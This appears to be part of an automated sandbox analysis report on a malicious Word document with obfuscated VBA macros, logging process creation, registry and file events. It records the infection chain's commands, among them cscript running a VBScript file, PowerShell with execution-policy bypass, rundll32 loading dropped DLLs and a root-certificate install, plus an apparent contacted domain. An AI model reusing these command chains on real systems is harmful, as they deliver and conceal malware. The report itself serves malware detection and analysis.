                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................/.k......................n.............}..v....`.......0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............(..k.....@U...............n.............}..v....(.......0...............................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................/.k......................n.............}..v....`.......0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............(..k.....@U...............n.............}..v............0.......................^.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................/.k....@.................n.............}..v............0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............(..k.....@U...............n.............}..v............0...............................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................/.k....8.................n.............}..v............0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............(..k.....@U...............n.............}..v............0.......................f.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................/.k......................n.............}..v....(.......0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w....... .......(..k.....@U...............n.............}..v............0................=U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................/.k....p.................n.............}..v............0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................(..k.....@U...............n.............}..v............0...............................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................../.k......................n.............}..v............0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............o.t. .b.e. .r.e.s.o.l.v.e.d.:. .'.l.o.t.o.l.a.n.d.s...c.o.m.'.".0................=U.....@.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................../.k......................n.............}..v............0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.0.n.............}..v............0................=U.....".......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................../.k....P.................n.............}..v............0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................(..k.....@U...............n.............}..v............0...............................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................../.k....P.................n.............}..v............0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................(..k.....@U...............n.............}..v.....!......0.......................R.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................../.k....."................n.............}..v.....#......0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................(..k.....@U...............n.............}..v.....)......0...............................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................../.k.....*................n.............}..v.....+......0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................(..k.....@U...............n.............}..v....H0......0.......................f.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................../.k.....1................n.............}..v.....1......0...............H>U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......(..k.....@U...............n.............}..v.....5......0................=U.............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...................../.k.....5................n.............}..v....H6......0...............H>U.............................Jump to behavior
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldr
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldr
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldr
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldr
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*Jump to behavior
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1Jump to behavior
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldrJump to behavior
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldrJump to behavior
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldrJump to behavior
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldrJump to behavior
                Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldrJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldrJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldrJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldrJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldrJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldrJump to behavior
                Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: sample.doc.docOLE indicator, Word Document stream: true
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$mple.doc.docJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREE34.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@25/19@5/4
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
                Source: sample.doc.docOLE document summary: title field not present or empty
                Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.drOLE document summary: title field not present or empty
                Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.drOLE document summary: author field not present or empty
                Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.drOLE document summary: edited time not present or 0
                Source: ~DFE56B344EF3200177.TMP.0.drOLE document summary: title field not present or empty
                Source: ~DFE56B344EF3200177.TMP.0.drOLE document summary: author field not present or empty
                Source: ~DFE56B344EF3200177.TMP.0.drOLE document summary: edited time not present or 0
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE document summary: title field not present or empty
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE document summary: author field not present or empty
                Source: ~DF77272A7F6F18B150.TMP.0.drOLE document summary: edited time not present or 0
                Source: ~DF26415DDA42946BBE.TMP.0.drOLE document summary: title field not present or empty
                Source: ~DF26415DDA42946BBE.TMP.0.drOLE document summary: author field not present or empty
                Source: ~DF26415DDA42946BBE.TMP.0.drOLE document summary: edited time not present or 0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
                Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: :ystem.pdb& source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: System.pdbgement.Automation.pdbBBw source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\System.pdby source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: System.pdb8 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
                Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.drInitial sample: OLE indicators vbamacros = False

                Data Obfuscation:

                barindex
                Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
                Source: sample.doc.docStream path 'Macros/VBA/Module1' : High number of string operations
                Source: sample.doc.docStream path 'Macros/VBA/Module2' : High number of string operations
                Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module Module1Name: Module1
                Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module Module2Name: Module2
                Source: ~DF77272A7F6F18B150.TMP.0.drStream path 'VBA/Module1' : High number of string operations
                Source: ~DF77272A7F6F18B150.TMP.0.drStream path 'VBA/Module2' : High number of string operations
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
